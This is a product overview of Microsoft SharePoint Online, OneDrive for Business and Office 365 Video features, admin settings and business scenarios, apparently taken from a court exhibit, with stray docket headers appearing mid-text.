"Modern" experiences are gradually released in SharePoint Online and you can control how they are taken into use from tenant or site level. If you have a lot of existing important customizations, you can defer taking new experiences into use until needed customizations scenarios can be enabled with them as well.

### Modern Team Site

The home page of a SharePoint Online modern team site gives you immediate visibility into site activity and important documents, with quick access to Office 365 Groups, its members and associated Office 365 apps.



You can access your team site from the SharePoint Home page, from the **Files** section of your Office 365 Group, or on the go with the SharePoint mobile app.





**Note:** Some functionality is introduced gradually to organizations that have opted in to the First Release program. This means that you may not yet see this feature or it may look different than what is described in the help articles.

For more details, refer to What is a team site? article.

## Team site publishing pages and new web parts

Modern team site pages are fast, easy to author and support rich multimedia content. And pages look great on any device, in a browser or from within the SharePoint app. Using pages is a great way to communicate and share your ideas—such as status and trip reports, how-to write-ups, know-before-you-go guides and frequently asked questions.



Just click the + sign and pick a web part from the toolbox to add content to your page. The new **"highlighted content" web part** lets you set criteria so that specific content will automatically and dynamically populate in that area of the page. And using the SharePoint Framework, developers can build custom web parts that will show up right in the toolbox.

## Integration with Office 365 Groups

Office 365 Groups is a powerful and productive platform that brings together conversations and calendar from Outlook, information and files from SharePoint, tasks from Planner, and a shared OneNote notebook into a single collaboration space for your team. All new and existing Office 365 Groups get a team site.



When you create an Office 365 Group in Office 365, a SharePoint team site is automatically created and any users you add to your Office 365 Group get added to the team site. All members of the Office 365 Group have access to the team site and can add additional document libraries, lists, and web apps as needed. There's no need to create a distribution list or a SharePoint group.

## Modern document libraries

Helping people share files and collaborate on content has always been central to our mission. That's why we're creating a better experience for document libraries that's faster, more intuitive and responsive.



Modern document libraries have an updated user interface that offers an experience similar to OneDrive, so it's more intuitive to create a new folder and upload files in the browser.

In a document library, you can:

- Add, edit, delete, co-author, and download documents.
- Control who has access to a library, a folder with in a library, or an individual file within a library.
- Track the activity on a file, such as when it was last modified, and receive a notification when something has changed.
- Create a custom view of a document library
- Share files or folders with others.
- Add a link in a document library to something that is stored outside the library, for example, a link to a file located in a different library or even a link to an external web page.
- Highlight a link, file or folder in a document library so you and others can get to them quickly.

Mobile browsers have the same features as the desktop, making SharePoint productive for every user—whether they interact via mouse, keyboard, touch or screen reader.

Case 0:20-cv-60416-XXXX   Document 3-14   Entered on FLSB Docket 02/26/2020   Page 36 of 117

Learn more about how to use modern libraries in this article: [What is a document library?](#)

## Modern Lists

We're delivering a **modern list** experience that looks great and is responsive, accessible and easy to use on any device. The modern SharePoint list experience will be automatically available to all existing classic SharePoint Online lists.



With modern SharePoint lists you can:

- Improve ease of use by empowering users to add columns to lists and sort, filter and group data in place.
- Elevate data quality by viewing and editing all item details in the information panel without leaving the list.
- Improve productivity by bulk editing list items with Quick Edit.
- Automate simple business processes with versions, approvals and alerts.
- Enrich static information with rich data types including people, images and managed metadata tags.

In addition, modern SharePoint lists look great on the **SharePoint mobile app** — making every location and every device a first-class component of business processes.



## Integrating PowerApps and Microsoft Flow

Customers regularly exchange data between SharePoint lists and other systems to support business processes. Flow automates workflow and data exchange between SharePoint and a variety of Microsoft and third-party services. Now, you can create and launch Flows directly from a SharePoint list and store and modify that data within SharePoint.





With PowerApps, you can connect, create and share business apps on any device in minutes. You can build efficient mobile forms and apps directly from a SharePoint list, without needing to write code. PowerApps and Flow share a common connector framework that allows you to weave in dozens of data sources on-premises and in the cloud, including Exchange, SQL, Dynamics, Salesforce, Google, Mail Chimp, Twitter, Wunderlist and more.



Flow and PowerApps are both currently in [public preview](#).

## SharePoint Site Contents page

The new SharePoint Online Site contents page has been redesigned to help site owners, members and visitors get an immediate view into the activities within the site, like site visits and trending content. Plus, it provides clearer access to add lists, document libraries, subsites and apps.



**Site visits and Trending content**

You can view the number of visits to your site within a rolling 7-day period. You can also view trending content - the most popular content on your site - over a rolling 2-week period.

**Tips**

Need help getting started creating and setting up content? Check the Tips box. You can go directly to the pages where you can set up and customize your site, lists, libraries, and more.

Refer to The SharePoint Site Contents page article for more information.

## New site collection limit

As more and more teams embrace the breadth of capabilities offered in SharePoint Online across team sites, Office 365 Video and portal sites, their content storage requirements are growing. To address this, we will increase the SharePoint Online site collection storage limit in the coming weeks from 1 TB to **25 TB**. This increased limit will be immediately reflected in the official SharePoint Online boundaries and limits article.

## SharePoint Mobile App

The SharePoint mobile app helps keep your work moving forward by providing quick access to your team sites, organizational portals and the people you work with throughout Office 365 by letting you search for content and people across your organization. We leverage the Microsoft Graph to power several of the in-app experiences, providing you relevant information to get to the content and people you work with most frequently.



You can use the SharePoint mobile app to:

- Navigate from Sites to team sites you follow or frequently visit.
- Navigate from Links to important sites configured by your organization.
- Catch up on what's happened with the Activity view, which shows recent file activity in your team site.
- Open your document libraries with the OneDrive app and then edit your files using Office mobile apps like Word, Excel, PowerPoint and OneNote.
- Learn more about people you work with and discover what they are working on.
- Perform an enterprise-wide search to find sites, files and people throughout your organization.
- Android first: you'll be able to launch a PowerApp from a team site directly in the SharePoint mobile app.

Learn more about SharePoint mobile app for iOS, SharePoint mobile app for Android and the SharePoint mobile app for Windows 10 Mobile.

## SharePoint Online sync preview

*Public preview* of a single sync experience for all your files in Office 365, across OneDrive and SharePoint has been announced. Please refer to new sync options in OneDrive section later in this document.

## Auto-acceleration for your SharePoint Online tenancy

SharePoint Online now supports home realm discovery when users log on by using third-party identity providers, such as Active Directory Federation Services (ADFS). This feature reduces logon prompts for users by "accelerating" the user through the Azure Active Directory home realm discovery logon page. This feature is called **auto-acceleration** and is applied by running a Windows PowerShell cmdlet in the SharePoint Online Management Shell.

Refer to Enable auto-acceleration for your SharePoint Online tenancy article for configuration details.

## Office 365 Public CDN Developer Preview

Office 365 Public Content Delivery Network (CDN) capability in the Office 365 will enable you to automatically host static assets, like images and JavaScript files in CDN for providing better performance with SharePoint pages. CDN will work effectively as a geo-distributed caching proxy, by caching the static assets closer to the browsers requesting them.

Office 365 Public CDN is now released as a *Developer Preview* for all tenants in Office 365. You can start using it by explicitly enabling the capability on the tenant level using PowerShell cmdlets.

Refer to Office 365 Public CDN Developer Preview Release blog post for more information.

## Scenarios

This section provides a walkthrough of some of the scenarios where SharePoint Online can be used in an Organization. In most of these scenarios, related services like OneDrive, Groups, RMS, Yammer, O365 Videos also play a role.

**Onboard new employees**

First days are stressful—for both new employees and the HR department. There's a lot to learn and a lot to tell.  SharePoint can be the single hub for everything that a new hire needs on its first day, and beyond.

You can make it easier for people to understand the business, and ramp up rapidly. You can take advantage of automatic task routing and use forms built right into your site, leading to less paperwork and faster completion.

- Onboarding Site with all the information new hires would need – Company information, Employee handbook, onboarding processes, Forms to fill and, documents to submit.
- New Hire Training material. Wikis, Videos, Documents and, links to LMS Courses/Modules
- Welcome Videos from the Leadership Team published in the New Hire Channel on O365 Videos
- Scan, OCR and Upload all the statutory documents submitted by Employees in to the Record Center. Search and retrieve as per need later
- Business Process Workflows to gather Employee information and complete joining formalities
- Yammer integration. Share content on Yammer and engage new hires in 2-way conversations

**Share your knowledge**

With SharePoint, your knowledge isn't limited to the people in your immediate circle. SharePoint lets you share what you know with as many people as you want, whether they're in your department or in another country.

- Knowledge Management Portal with one or more Site Collections having one or more document libraries each to store content as per the appropriate information architecture
- Assign Viewers, Members and Owners Permissions to users as per the business need
- Rights Management integration in document libraries containing sensitive documents
- Approval workflows to review the content being submitted
- Term Store hierarchies to create a Taxonomy to tag, navigate and search documents
- Retention Policies to expire/archive old content
- Show Videos published in Office 365 Videos
- Yammer integration to share the documents on Yammer for feedback, discussion and updates
- Delve powers the content discovery

**Digitize your records**

All Organizations handle a lot of paper documents – employee records, Know Your Customer (KYC) documents, legal agreements, land records, project files, purchase orders etc. Storing paper can be costly, particularly when offsite storage is required, and offers no return on investment. Retrieving paper documents is time consuming and the possibility exists that they can be misplaced.

Document digitization is the process of converting paper documents into digital format. SharePoint lets you manage these digital records securely and meet legal and compliance needs through its content encryption, retention policies, auditing and ediscovery capabilities.

Microsoft Partners provide scanning solutions integrated with SharePoint Online to support your document input lifecycle needs through scanning, OCR, barcode recognition, indexing and many more other features.

- Share and Track records. Scanning can help you share the information in those records instantly with users across multiple locations. They can eliminate the need for costly reproduction and mailing and are also easier to track electronically.
- Prepare for disasters. Scanned records can be an integral part of your disaster recovery plan. This provides extra assurance that you will be able to access the information in the records should disaster strike.
- Respond to audits and discoveries. Records are subject to audits, discovery demands, and related legal inquiries. These requests are often high-profile and extremely time sensitive. Digital records are easy to store & search and can help you quickly comply with these kinds of requests.
- Protect aging paper originals. In case of fragile paper records, scanning can offer significant benefits. Digitizing fragile records preserves the integrity of the originals by allowing them to be handled less. And often, the scanning process increases legibility of aging or hard-to-read records.
- Save money and free up office space. Storing paper records in your office is extremely costly. If you have paper records that are currently taking up space in your office, digitizing these records can save you both storage space and money.

**Boost business processes**

With SharePoint you could improve your business processes and help people save time. Automating recurring approval or review processes is easy and doesn't take much time with built-in workflows. With Visio you can work with others to design and model processes that run in SharePoint.

- Employee Self Service Portal. Automate all employee processes like Leaves, Expense Reimbursement, Employee Benefits, Investment Declaration, Voluntary Provident Fund, LTA
- Automate IT Service requests like SmartCard, Hardware procurement, Software procurement, Software download, Installation and, Support
- Other requests like Travel, Cab, Visa, Company Letter, Employment Certificate, Salary Certificate

**Align your teams**

Deals are won and lost depending on how closely marketing and sales teams are aligned. That's how important communication is

and that's why SharePoint gives people a better way to stay in sync.

- SharePoint site (Sales Portal) where sales representatives can access the most up-to-date marketing information, even when on the road, so that messaging is consistent.
- Sales and Marketing teams can work together, refine content and keep it up to date
- Sales Excellence team can publish Sales reports, campaigns, promotions, contests and other relevant updates
- Rights Management integration in document libraries containing sensitive documents
- O365 Video Channels to host videos on service offerings, product updates, selling it right, major announcements, how to compete and, win & loss analysis
- Yammer Groups where teams can have conversations, share ideas, share best practices, knowledge on customers, competitors, or sales processes, making it easier to act on new opportunities and close deals more quickly.

**Crunch the numbers together**

Crunching the numbers doesn't have to be difficult. SharePoint lets you gather a lot of information from different people and different departments into a single spreadsheet or multiple. Best of all, you can work with more than one person—even your whole team if you want—on the same spreadsheet at the same time.

Crunching the numbers together doesn't just make your life easier, but it also helps boost productivity and can lead to more insights that can be easily shared with anyone in your organization.

- Budgeting or Quota setting exercises where multiple teams need to come together and provide inputs which need analysis and discussion
- RFP Response Teams working on complex bids where multiple inputs are required from users across multiple locations – requirements, effort estimates, input costs, billing rates, quality parameters, timelines and, competitors.

**Help meet compliance needs**

Trying to make sense of all the rules, laws, and regulations you need to follow is hard enough without retrofitting your whole IT infrastructure to comply with them. You won't run into this problem with SharePoint because it's built to make compliance easy and straightforward.

- Digitize and preserve important Paper documents and files like land records, employee records, contracts and other legal agreements
- Automate many of the processes for managing, protecting, and preserving critical data
- Create retention schedules to manage the entire life cycle of your organization's digital assets.
- Respond quickly to litigation or audits by using self-service eDiscovery to help get what you need immediately without involving IT.

**Provide the right support**

SharePoint and Yammer working together can help you take your IT support beyond the telephone - way beyond. Think of it as a virtual helpdesk.

- A one-stop shop where people can get in touch with IT, browse through a shared knowledge base, and submit ticket requests to get help.
- Enterprise Wiki to capture and share all the support and troubleshooting information. Quicker answers to common problems.
- Office 365 Videos channel to host videos on common tasks and self-service troubleshooting
- Yammer Groups for faster, more focused conversations between people and IT—all without ever being placed on hold.

**Other scenarios**

With its rich feature set SharePoint can help you solve lot more business problems. Some of these would require study of existing processes and applications and Organization's vision and priorities.

- **Intranet Portal**. Corporate news, Industry News, company history, founders, leadership team, offices, CSR activities, award winners
- **Department Sites**. HR, Finance, Legal, Sales, Marketing, Travel, Quality etc. – structure, leaders, locations, useful documents, FAQs, Yammer presence, Video channels.
- **Country sites**. Travel information for employees visiting different countries. Cities, Culture, Stay, Food, Currency, Things to see, Local contacts, Helpline numbers, useful Yammer Groups and Video Channels
- **Careers website**. Career profiles, Roles in technical / non-technical streams, training opportunities, mentoring programs, soft skill programs, part-time education, work from home programs and, current openings.

## Resources

**General Information**

- SharePoint Online Service Descriptions
- Data Encryption in OneDrive for Business and SharePoint Online
- Find content about SharePoint Online for Office 365 for business
- Should I save my documents to OneDrive for Business or a team site?
- Set up Office 365 file storage and sharing
- Work with files in a document library

**Microsoft Virtual Academy (MVA) Courses**

- The Modern Intranet Powered by SharePoint Services
- Plan a Collaboration Solution Using Office 365
- SharePoint and Office 365 Cloud-Connected Hybrid Scenarios
- Office Graph, Delve, and SharePoint: Better Together
- Transform SharePoint Customizations to SharePoint App Model
- Create SharePoint Online Site Collections

- [SharePoint Online Migration Planning](#)

**Planning**

- [Plan sites and manage users](#)
- [Plan content on sites](#)
- [Plan the content for your Team Site](#)
- [Best practices for creating and managing team sites](#)

**Performance**

- [Diagnosing performance issues with SharePoint Online](#)
- [Navigation options for SharePoint Online](#)
- [Using content delivery networks in SharePoint Online](#)
- [Delay loading images and JavaScript in SharePoint Online](#)

**Developers**

- [Customize your Office 365 team site for file storage and sharing](#)
- [SharePoint Add-ins](#)
- [Use the App Catalog to make custom business apps available for your SharePoint Online environment](#)

Also, refer to the [Office 365 Application Development](#) section later in this document.

**Administrators**

- [Find content about the SharePoint Online admin center](#)
- [Manage site collections and global settings in the SharePoint admin center](#)
- [SharePoint Online URLs or IP addresses](#)
- [SharePoint Online: software boundaries and limits](#)
- [Introduction to the SharePoint Online Management Shell](#)
- [Enable auto-acceleration for your SharePoint Online tenancy](#)
- [Introduction: Control user access with permissions](#)
- [Edit permissions for a list, library, or individual item](#)
- [Types of files that cannot be added to a list or library](#)
- [SharePoint Business to Business Collaboration: Extranet for Partners with Office 365](#)
- [Create a partner-facing Extranet Site in Office 365](#)
- [Restricted Domains Sharing in O365 SharePoint Online and OneDrive for Business](#)
- [Switch the default experience for lists or document libraries from new or classic](#)
- [Restrict access to SharePoint Online with Microsoft Intune](#)

## OneDrive for Business (OneDrive)

> *Store your files with the industry leader in enterprise-grade software, not a startup or consumer-focused company.*

OneDrive for Business is a place where you can store, sync, and share your work files. OneDrive lets you update and share your files from anywhere and work on Office documents with others at the same time.

## Features

> *Save your work files to OneDrive for Business so they're always with you*

- **Store**. Securely store all your files and share them with coworkers. Each user gets 1 TB of storage.
- **Sync**. Sync files across devices and access them anywhere, even when you're offline.
- **Search**. Find the files you need in seconds with simple search. Or use Office Delve to discover new relevant content.

> *Get work done together with anyone at any time*

- **Share**. Securely share your files with colleagues, business partners, or customers. You control who can see and edit each file.
- **Contribute**. OneDrive for Business lets you use familiar tools to create, edit, and review documents in real time and even discuss them on Yammer.
- **Manage**. Keep everyone working on the most recent version of a document, and view or restore previous versions if you need to.

## Storage plans

Office 365 customers on our premium Enterprise, Government and Education plans will receive OneDrive for Business unlimited storage. Specifically, this includes unlimited storage for individuals in organizations with more than five people subscribing to one of the following plans:

- Office 365 Enterprise E3, E4 and E5
- Office 365 Government E3, E4 and E5
- Office 365 Education
- OneDrive for Business Plan 2 and SharePoint Online Plan 2

**Note**: Customers on all other Office 365 Enterprise, Business and standalone plans that include OneDrive for Business will continue to receive 1 TB of storage per user.

## Modern Attachments

In Outlook 2016 you can easily attach documents you most recently worked on to your emails from the Insert tab. When you attach files from OneDrive for Business or SharePoint Online, you can share them as View only, or give the recipients Edit permissions, which helps them collaborate easily on one copy that everyone works on.

- **Recent items**. Outlook provides you with a list of the recent files you saved or worked with. These files could be saved locally, or they might exist on internal network locations, such as OneDrive, Group Files, and SharePoint.



- **Browse Web Locations**. This option lets you select files from your OneDrive, SharePoint sites, or Group Files that you've accessed before.



**Manage the items attached to an email**

After you've attached an item, select the drop-down menu next to the attachment to take other actions, such as Open, Remove, Print and so on.

If you've attached a file from a shared location, you can also choose:

- **Attach as copy**. If you want to send a local copy of a file, instead of the file on a shared location.



- **Change permissions**. If you want to select edit or view only permissions on a shared file



## Next Generation Sync Client for Windows and Mac

> Office 365 ProPlus software available for download, **doesn't include** the next generation sync client for PCs.

**Setup Guidance**

Step-by-step guidance for IT administrators to deploy the OneDrive for Business Next Generation Sync Client to your organization is available for both Windows and Mac OS X.

For users who want to set up Next Generation Sync Client on their own there are setup guides for Windows and Mac OS X.

> To block users in your tenant from syncing OneDrive for Business libraries using the old OneDrive for Business sync client (groove.exe), set the **GrooveBlockOption** parameter value to **HardOptIn** in Set-SPOTenantSyncClientRestriction cmdlet.

## New and Upcoming features

Information in this section is based on blog post: Major OneDrive updates at Ignite 2016 include SharePoint Online sync preview

### Powerful new sync options

*Public preview* of a single sync experience for all your files in Office 365, across OneDrive and SharePoint has been announced. Refer to Get started syncing SharePoint sites with the new OneDrive sync client – Preview article.

- SharePoint sync is being added to the OneDrive sync client, which we released last year, and offers superior levels of reliability, performance and control—including the flexibility to select the specific folders you want to take offline.



- **Shared folder sync** is another powerful capability shipping with this preview. If a colleague in your organization shares a folder with you from their OneDrive, then you can choose to take that folder offline.
- For better visibility of what is going on with your sync client, we're rolling out the **activity center**. When a file is added, deleted or changed in a folder that you are syncing, the activity center shows you exactly what happened—so you can catch up on the most recent activity and see current sync status.



## Better previews and thumbnails

OneDrive offers deep integration with Office Online, so you can view, edit and create Office files from any browser. There are times you want to view other types of files in the browser without downloading them. Rich previews for your most commonly used business file types are being enabled (rolling out before the end of 2016).



Without leaving OneDrive, you will be able to preview Adobe files, including Illustrator (.ai), Photoshop (.psd) and Encapsulated PostScript (.eps). Email files (.msg and .eml), almost all photo files (including many RAW formats) and streaming video are also supported. Additionally, most of these file types now have high resolution thumbnails in the folder's tile view.



## Access all your Office 365 files through the OneDrive browser experience

Our mission is to enable you to work with all your Office 365 files wherever you are. We're releasing an update to the OneDrive browser experience that enables you to access, edit and share all files and folders in SharePoint Online that you own or follow. Combined with the single experience in mobile apps and sync, you have one consistent way to work with the Office 365 files you care about.



We'll start rolling this out to First Release customers in the coming months, and rollout to all customers will be complete in the first quarter of 2017.

## Download multiple files as a .zip file

In the OneDrive browser experience, you can select multiple files and folders and download them in a .zip file. This update is rolling out before end of 2016.

## Keep informed with mobile notifications

For iOS or Android users, we've added notifications when a colleague shares a file with you. You can now open the file directly from the notification.

## Extending the Scan function to handle multiple photos

Earlier this year we released the **Scan** function on Android, which enables you to take single photos that are then converted to PDF files and uploaded to OneDrive. We've now expanded this allow you to add multiple photos and combine them in the one PDF file. Now you can scan your multi-page expense receipt or extensive notes across multiple whiteboards into a single PDF that's uploaded and stored in OneDrive.

This feature will be rolling out to iOS in the coming weeks.

## Understand the reach and impact of your work

When you copy from OneDrive to SharePoint your file becomes accessible and discoverable by your team. On iOS, you can see over time how many people have discovered and viewed your files. This provides simple insight into the impact of your work.

 

We'll add this capability to Android and Windows in future updates.

## New deeper Office 2016 integration

In the top right of the Office 2016 ribbon, you can see (available in First Release) the users who are currently editing the file and launch Skype for Business to converse in real-time. You can also share the file, see the history of all activity on the file as well.



Being able to share with others and getting a snapshot of what is going on with your file without having to jump out of the Office app are big time-savers.

Additionally, when you click the File tab to open a file, you'll notice now that in addition to having access to files you recently accessed in OneDrive and SharePoint Online, you can now also access files most recently shared with you. The result is simple: access to all the files you're working with on any device.



## Per-user controls for OneDrive

We'll add (rolling out before the end of 2016) **per-user controls for OneDrive** directly in the Office 365 User Management console. As an admin, you will be able to set the storage quota and external sharing permissions for a specific user, as well as help a user who misplaced a file or inadvertently shared the wrong file with others. In emergencies, such as a lost device, you can sign a user out of OneDrive on all devices. And, when an employee leaves the organization or is terminated, you can take over the user's OneDrive to move or copy important files to other locations.

## Dedicated admin console for OneDrive

This provides one place to discover and configure OneDrive-specific settings and perform administrative tasks—many of which used to require PowerShell. Once deployed to your tenant, all tenant and SharePoint admins will have permissions to access the OneDrive admin center preview at https://admin.onedrive.com



Key features by section include:

- **Home**: This is the dashboard for the admin center and will soon show recent Office 365 Message Center posts and usage reporting related to OneDrive for Business.
- **Sharing**: This section helps admins gain control over how and with whom your users are sharing information. This includes controlling the use of external sharing and anonymous links, as well as limiting which external domains users can share with.
- **Sync**: Admins can block syncing of specific file types and deny syncing to non-domain joined PCs.
- **Storage**: This section allows admins to easily set default storage limits and document retention durations.
- **Device Access**: This gives admins control over how and from where a user can access retheir files. This includes allow/deny access from personal devices or specific networks as well as rich Mobile Application Management Intune policies for iOS and Android.
- **Compliance**: Admins can find quick links to the Office 365 Security and Compliance Center for key scenarios like auditing, data loss prevention, retention, and eDiscovery.

## Options to secure OneDrive

### Control provisioning of OneDrive

OneDrive for a user is created when they click on OneDrive tile or access the service first time. Their ability to create OneDrive site is governed by the create personal site permission in SharePoint Online. By default, the permission is assigned to all users.

If your Organization is looking for a phased rollout then you can create specific user groups and assign the create personal site permission to them.

### Enable Sync client restrictions

SharePoint Online administrator can use PowerShell cmdlets to enable the OneDrive for Business sync client from **only** the domains present in the safe recipients list. For more information, read Use Windows PowerShell cmdlets to enable OneDrive sync for domains that are on the safe recipients list.

After that, if the version of sync client on a user's PC is earlier than 15.0.4693.1000, sync client is considered outdated and user will not be able to sync documents.

### Configure restricted Domain sharing

At a tenant level, administrators can configure external sharing by using either the **Allow List** or **Deny List** feature. Administrators can limit sharing invitations to a limited number of email domains by listing them in the Allow List or opt to use the Deny List, listing email domains to which users are prohibited to extend invitations.



Additional parameters have been added to the PowerShell cmdlet, Set-SPOTenant, to allow configuration of restricted domains using PowerShell.

All external sharing invitation emails will blind copied to set mailboxes using *BccExternalSharingInvitations* and *BccExternalSharingInvitationsList* parameters.

### Discourage Org-wide sharing

To discourage users from sharing files from their OneDrive with everyone in the Organization, hide "Everyone", "All Users" and "Everyone except External Users" groups in the people picker.

The Parameters to configure in the PowerShell cmdlet - Set-SPOTenant are *ShowAllUsersClaim*, *ShowEveryoneClaim* and *ShowEveryoneExceptExternalUsersClaim*.

### Restrict Sync based on file types

When required, block syncing of certain file types using the new sync client. For e.g. sync of .pst and .mp4 can be blocked as all emails should in EXO mailbox and videos should be in O365 Videos service Or, just to conserve bandwidth consumption.

The Parameters to configure in the PowerShell cmdlet - Set-SPOTenantSyncClientRestriction is *ExcludedFileExtensions*.

### Monitor User activities

Office 365 Audit log search and Management Activity APIs enable monitoring of user activities on OneDrive and also integrate them with existing SIEM tool in your Organization. Refer to the Audit log search section later in this document.

### Configure usage or anomaly based alerts

Office 365 Advanced Security Management enables you to set up **anomaly detection policies**, so you can be alerted to potential breaches of your network. For example, you can be alerted to impossible travel scenarios, such as if a user signs in to the service to check their mail from New York and then two minutes later is downloading a document from OneDrive in Tokyo.

Advanced Security Management also lets you set up that can track specific activities. With out-of-the-box templates like **Mass download by a single user**, IT can easily create policies that flag when someone is downloading an unusually large amount of data. Alerts can also be for multiple failed sign-in attempts or signs in from a risky IP address.

### Configure Mobile App Management (MAM) for mobiles

Intune MAM, part of Enterprise Mobility + Security (EMS) suite, provides ability to manage OneDrive mobile app and disable

user's ability to copy-paste corporate content from their OneDrive to a non-managed/consumer app.

**Configure Conditional Access**

Azure AD Premium, part of Enterprise Mobility + Security (EMS) suite, provides **Risk-based conditional access** through an intelligent assessment of granting or blocking access to OneDrive. For e.g. access to OneDrive can be blocked is the user is using non-managed device.

**Additional Administrative settings for the sync client**

A variety of OneDrive and OneDrive for Business settings can be centrally administered through group policy. The group policy objects are available as part of the OneDrive Deployment Package.

The following User Configuration group policies are available:

- Coauthoring and in-app sharing for Office files
- Configure OneDrive.exe to receive updates after consumer production
- Prevent users from changing the location of their OneDrive folder
- Prevent users from configuring personal OneDrive accounts
- Set the default location for the OneDrive folder
- Users can choose how to handle Office files in conflict

The following Computer Configuration group policies are available:

- Prevent users from using the remote file fetch feature to access files on the computer
- Set the maximum percentage of upload bandwidth that OneDrive.exe uses

For more information, refer to Administrative settings for the new OneDrive sync client support article.

## OneDrive for Business usage reports

The new Office 365 Reports dashboard shows you the activity overview across the Office 365 products in your organization. The OneDrive card on the dashboard gives you a high-level view of the value you are getting from OneDrive in terms of the total number of files and storage used across all the OneDrive accounts in your organization. You can then drill into it to understand the trends of active OneDrive accounts, how many files are users interacting with as well as the storage used. It also gives you the per OneDrive account details.

You can get a view into OneDrive for Business usage by looking at the **Sites**, **Files**, and **Storage** views.



Refer to: Activity Reports in the Office 365 admin center and Office 365 Reports in the new Admin Center - OneDrive for Business usage articles for more details.

## Migrate files from on-premises OneDrive in SharePoint 2013

After you connect your SharePoint Server 2013 on-premises users to OneDrive for Business in Office 365, the first step is planning how your users will move their files to the cloud.

There are two ways in which you can plan to migrate your users' files from their on-premises SharePoint Server 2013 OneDrive for Business document libraries to OneDrive for Business in Office 365:

- **Self-service migration**: The users select the documents they want to migrate and then move them to Office 365.
- **Tool-based migration**: The IT administrator creates or purchases a migration tool to move the content.

For more details, read the Migrate OneDrive for Business document library files from on-premises SharePoint 2013 to Office 365 article.

## Scenarios

- Drive Personal productivity. Be Productive from anywhere and from any device.
- **Protect your critical business information**. Cloud saved files are not lost when local hard drives fail or are stolen, or if an employee leaves the company and takes the computer & files with them.

## Resources

**Watch Videos** ...

- OneDrive for Business: Sync client updates demo
- OneDrive for Business: Demo of mobile device updates
- OneDrive for Business: Updates to web experiences
- OneDrive for Business: Demo of IT control updates
- OneDrive for Business: Demo tour of updates to sync client, mobile and web
- New IT management options in OneDrive for Business

**Read** ...

- [File Security in Microsoft SharePoint and OneDrive for Business](#)
- [Manage My Site settings for SharePoint Online](#)
- [How user profiles are deleted in SharePoint Online and OneDrive for Business](#)
- [Attach a file to an email in Outlook 2016 for Windows](#)
- [Use Windows PowerShell cmdlets to enable OneDrive sync for domains that are on the safe recipients list](#)
- [Restricted Domains Sharing in O365 SharePoint Online and OneDrive for Business](#)
- [How to determine the version of OneDrive for Business Sync client](#)
- [How to enumerate a domain GUID in an Active Directory forest](#)
- [Transition from the existing OneDrive for Business sync client](#)
- [Deploying the OneDrive for Business Next Generation Sync Client in an enterprise environment](#)
- [Deploying the OneDrive Next Generation Sync Client on OS X and configuring work or school accounts](#)
- [Office 365 Reports in the new Admin Center - OneDrive for Business usage](#)

## Office 365 Videos

Office 365 Video is an intranet website portal where people in your organization can post and view videos. It's a streaming video service for your organization that's available with SharePoint Online in Office 365. It's a great place to share videos of executive communications or recordings of classes, meetings, presentations, or training sessions.

### Features

#### Channels

- Channel admins for Office 365 Video can create channels to organize videos.
- You can have channels for particular subjects, for example, or for specific groups such as departments or teams
- You see only the channels that you have permission to view

#### Uploading videos

- To upload a video, you upload it to a specific channel.
- You can upload multiple videos to a channel at the same time.
- Anyone in your organization who has edit permission for a particular channel can upload videos to it

#### Editing information about a video

- Providing information about a video will make it easier for other people to find it through search, and will provide additional context for it in Delve and the Office Graph
- You have to have owner or editor permission for the channel that the video is in

#### Owner and people metadata

- Office 365 Video also shows who uploaded the video and the various people who are in the video.
- This enhances the discoverability of the video and highlights the main speakers; it, too, enhances when and how your videos appear in other users' Delve activity feeds pivoting off the relevant context of who knows who

#### Changing a thumbnail for a video

- After a video you've uploaded to Office 365 Video has been processed and is ready to play, you can add a custom thumbnail for the video or you can choose from one of the auto-generated thumbnails provided.

#### Add subtitles or captions

- Subtitles or captions are lines of text that appear at the bottom of a video and provide a transcript of the audio portion of the video
- You can add subtitles or captions to any video by uploading one or more subtitle or caption files



- Office 365 Video only supports the Web Video Text Track (.vtt) file format.

#### Watching a video

- You can watch videos from where they are featured on the Office 365 Video home page, and from specific channels.
- When you select a video thumbnail, the video plays right in your browser window

#### Sharing videos with others



- Embed an Office 365 video on your site. You can display the video on a SharePoint Online site or other website by adding the embed code for that video to the page where you want the video to appear.
- Post to Yammer. You can post to Yammer about a video while you're watching it, and your post will automatically include a link to the video that you're watching.
- Send a link to a video in an email. To get a link for a video, select the video in Office 365 Video and then copy the URL from the browser address bar.

#### Discover spotlighted channels and videos

- Admin can spotlight up to three channels and four videos on the home page.
- Person with edit permission for a channel can spotlight up to five videos on the page for that channel.

**Find the most popular videos**

- See what videos are most popular for your entire organization, check the Trending section on the home page.
- See what videos are particularly popular in a certain channel, check the Trending section on that channel page.

**Find videos that you've uploaded**

- See what videos you've uploaded to a channel, select a channel, and then choose My Videos.

**Search for a video**

- Search for a particular video by typing what you are searching for in the Search videos box.
- Find videos that are in Office 365 Video by using SharePoint enterprise search.

**Restore a video in the Recycle Bin**

- Deleted videos sit in the Recycle Bin for 90 days, and it is now possible to recover and restore videos from the Recycle Bin.
- Admins can restore videos that have been deleted by a user

## Channel permissions

There are three types of channel permissions: owners, editors, and viewers. You must have owner permission to change permission settings.

- **Owners** - has full control over a channel. They can manage the channel from the channel settings page, upload videos, delete videos, and delete the channel.
- **Editors** - has edit permission for a channel. They can upload videos and delete videos. Then cannot manage the channel settings or delete the channel.
- **Viewers** - can view all of the videos that are in the channel. By default, everyone in your organization has viewer permission for a channel when the channel is created.

By default, only channel owners will see the download link on the player page for videos. To change who can download videos from the channel, select an option from the **Show download link for videos to** list.

## View statistics for a video

The video viewer statistics gives people insights into how their videos are being viewed—highlighting viewing spikes where shared via email and Yammer or discovered within Office Delve. It shows aggregate data on how many people have watched your video and how long they spend watching it, visualizing the drop-off rates over time.

On the Video page, next to the date when the video was uploaded, you'll see the cumulative number of video views. This information is updated every 15-20 minutes.



The **Statistics** link shows additional statistics for that video. The first graph shows:

- the total number of views by day for the last 14 days
- the total number of unique visitors by day for the last 14 days
- the total number of views per month for the last 36 months
- the sum of unique daily visitor counts per month for the last 36 months.

This information is updated once a day.



The second graph shows how viewers interacted with the video. For example, you can see which parts of your video users viewed the most or the least. The numbers on the left represent the number of times a specific section of the video was viewed. The numbers along the bottom of the graph represent 10 specific time ranges within the video and the percentage of the video that corresponds to each time range. This information is updated once a day.



## Client Requirements

**Desktop**

| Browser | OS | Playback Supported |
|---------|----|--------------------|
| Edge | Windows 10 | HTML5 |

Case 0:20-cv-60416-XXXC   Document 3-14 Entered on FLSB Docket 02/26/2020   Page 219 of
726
Case 0:20-cv-60416-AMC   Document 1-14 Entered on FLSD Docket 02/26/2020   Page 48 of
117

| Browser | OS | Playback Supported |
|---------|-----|-------------------|
